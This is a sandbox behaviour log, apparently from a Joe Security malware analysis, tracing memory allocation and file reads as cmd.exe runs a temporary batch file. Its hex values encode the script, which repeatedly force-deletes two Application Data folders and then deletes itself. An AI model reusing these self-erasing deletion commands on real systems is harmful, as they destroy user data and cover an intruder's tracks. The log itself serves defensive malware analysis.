Memory allocated PID: 604 Path: C:\WINDOWS\system32\cmd.exe Base: 970000 Length: 13FE10 Allocation Type: null Protection: page read and write success or wait 2109853363
Section loaded Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Access: query and read Type: commit Baseaddress: 980000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2109890021
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Offset: none Length: 8192 Value: 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 46 6F 6C 75 76 22 0D 0A 72 64 20 2F 53 20 2F 51 20 22 success or wait 2109896422
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Offset: none Length: 8192 Value: 3A 64 0D 0A 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 46 6F 6C 75 76 22 0D 0A 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 success or wait 2109911653
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Offset: none Length: 8192 Value: 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 46 6F 6C 75 76 22 0D 0A 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E success or wait 2109927049
File opened Path: C:\Documents and Settings\Administrator\Application Data\Foluv Access: read attributes and delete and synchronize Options: directory file and synchronous io non alert and open for backup ident and open reparse point object name not found 2109940011
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Offset: none Length: 8192 Value: 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 51 69 6F 6B 7A 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 success or wait 2109947964
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze Access: read attributes and delete and synchronize Options: directory file and synchronous io non alert and open for backup ident and open reparse point object name not found 2109961148
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Offset: none Length: 8192 Value: 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 46 6F 6C 75 76 22 20 67 6F 74 6F 20 64 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D success or wait 2109967275
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Offset: none Length: 8192 Value: 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 51 69 6F 6B 7A 65 22 20 67 6F 74 6F 20 64 0D 0A 64 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 success or wait 2110014574
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Offset: none Length: 8192 Value: 64 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 74 6D 70 34 64 39 34 65 34 64 37 2E 62 61 74 22 0D 0A 20 44 61 74 61 5C 51 69 6F 6B 7A 65 22 20 67 6F 74 6F 20 64 0D 0A 00 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 success or wait 2110031192
File opened Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Access: read attributes and delete Options: non directory file and open for backup ident and open reparse point success or wait 2110046261
File opened Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false object name not found 2110050678
Copyright 2011 Joe Security | All rights reserved | www.joesecurity.org | This page is optimized for firefox - 1024x786